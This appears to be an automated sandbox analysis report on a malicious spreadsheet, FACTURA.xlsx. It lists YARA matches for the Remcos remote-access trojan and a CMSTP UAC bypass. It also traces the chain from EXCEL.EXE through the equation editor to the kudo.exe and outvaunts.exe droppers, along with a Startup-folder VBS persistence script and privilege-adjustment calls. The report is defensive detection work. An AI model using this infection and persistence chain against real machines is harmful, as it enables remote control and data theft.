              Source: 00000015.00000002.486414613.0000000000FC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000018.00000002.490891992.0000000000F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000016.00000002.488528357.0000000000800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: Process Memory Space: outvaunts.exe PID: 3860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3884, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3912, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3920, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3932, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3940, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3948, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3960, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3972, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3980, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3988, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 4036, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 4044, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 4052, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 4060, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 4072, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 4080, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 4088, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 2884, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3084, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3100, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3116, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3132, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3148, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3164, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: outvaunts.exe PID: 3176, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@73/75@1/2
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086A06A GetLastError,FormatMessageW,5_2_0086A06A
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008581CB AdjustTokenPrivileges,CloseHandle,5_2_008581CB
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_008587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_008587E1
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013B81CB AdjustTokenPrivileges,CloseHandle,6_2_013B81CB
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeCode function: 6_2_013B87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_013B87E1
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,5_2_0086B3FB
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0087EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_0087EE0D
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_0086C397 CoInitialize,CoCreateInstance,CoUninitialize,5_2_0086C397
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeCode function: 5_2_00804E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,5_2_00804E89
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$FACTURA.xlsxJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC31F.tmpJump to behavior
              Source: FACTURA.xlsxOLE indicator, Workbook stream: true
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs"
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: FACTURA.xlsxReversingLabs: Detection: 63%
              Source: FACTURA.xlsxVirustotal: Detection: 45%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\kudo.exe "C:\Users\user\AppData\Local\Temp\kudo.exe"
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\Temp\kudo.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\kudo.exe "C:\Users\user\AppData\Local\Temp\kudo.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\kudo.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\Temp\kudo.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\complacence\outvaunts.exeProcess created: C:\Users\user\AppData\Local\complacence\outvaunts.exe "C:\Users\user\AppData\Local\complacence\outvaunts.exe"Jump to behavior
